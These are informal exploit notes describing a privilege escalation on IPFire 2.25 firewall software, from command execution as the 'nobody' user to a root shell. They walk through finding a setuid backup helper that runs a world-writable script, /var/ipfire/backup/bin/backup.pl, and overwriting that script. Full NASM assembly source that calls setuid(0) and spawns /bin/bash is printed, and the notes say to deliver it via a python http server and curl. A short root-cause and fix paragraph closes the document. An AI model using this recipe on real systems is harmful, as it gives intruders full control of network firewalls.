- the system runs a command when any package is installed
- system getting 7zip from just html
- and check the tmp directory
- version 2.25 - core update 156
- IPFire allows running arbitrary OS commands as nobody after login
- check the suid binaries
- the backup program runs another script: /var/ipfire/backup/bin/backup.pl (despite the .pl extension it is a bash script, and its permissions look good)
- try writing to the bash script. (No error. GOOD!)
- try run bash
- yes, we can run it, but the shell is low-privileged. we must trigger setuid(0)!
- save this and run
alti name.asm q
- alti is my own compile-check program in soo_deep repo.
; NASM (Intel syntax), x86-64 Linux, raw syscalls only (no libc).
;
; Flow: setuid(0); if it returns 0, execve("/bin/bash", NULL, NULL);
; otherwise write "basarisiz." ("failed") to stdout and exit(0).
;
; setuid(0) only succeeds for a process that already holds the privilege to
; change its UID, so this binary gains nothing on its own. In the write-up it
; is presumably effective only because it is started from a script that is
; executed privileged yet writable by an unprivileged user.
bits 64

SYS_WRITE       equ 1
SYS_EXECVE      equ 59
SYS_EXIT        equ 60
SYS_SETUID      equ 105
STDOUT_FD       equ 1

section .data
shell_path      db "/bin/bash",0x00
fail_msg        db "basarisiz.",0x0a,0x00
fail_len        equ $-fail_msg          ; byte count, trailing NUL included

section .text
global main
main:
        mov     eax, SYS_SETUID         ; rax = setuid
        xor     edi, edi                ; uid = 0
        syscall
        test    rax, rax                ; 0 = success, negative = -errno
        jz      .spawn_shell

        ; setuid was refused: report it and leave.
        mov     eax, SYS_WRITE
        mov     edi, STDOUT_FD
        mov     rsi, fail_msg
        mov     edx, fail_len
        syscall

        mov     eax, SYS_EXIT
        xor     edi, edi                ; exit status 0 even on this failure path
        syscall

.spawn_shell:
        ; Replace the process image with the shell; argv and envp are both NULL.
        ; Nothing follows this syscall, so a failed execve falls off the end of main.
        mov     eax, SYS_EXECVE
        mov     rdi, shell_path
        xor     esi, esi                ; argv = NULL
        xor     edx, edx                ; envp = NULL
        syscall
-
and write the new program to /var/ipfire/backup/bin/backup.pl. (we can use a python http server and curl to write it)
-
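and enjoy the root shell!

Root cause, for anyone auditing or fixing this: a script that ends up being executed with root privileges (apparently through the setuid backup helper) is writable by the unprivileged nobody user. Making /var/ipfire/backup/bin/backup.pl root-owned and not writable by other users, and alerting on any change to it, closes this escalation step.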